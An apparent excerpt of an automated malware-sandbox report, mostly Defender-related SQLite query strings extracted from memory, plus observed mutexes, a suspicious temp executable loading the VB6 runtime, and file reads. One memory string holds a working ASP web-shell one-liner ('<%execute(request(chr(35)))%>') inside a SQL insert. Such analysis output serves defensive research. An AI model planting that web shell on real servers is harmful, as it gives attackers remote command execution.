Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	Binary or memory string: insertinto[bin_cmd](cmd)values('<%execute(request(chr(35)))%>')
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT (SELECT COUNT() FROM File) + (SELECT COUNT() FROM FileInstance);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57DB1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle,

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Mutant created: \Sessions\1\BaseNamedObjects\VXQYjPtm
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6548:304:WilStaging_02

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

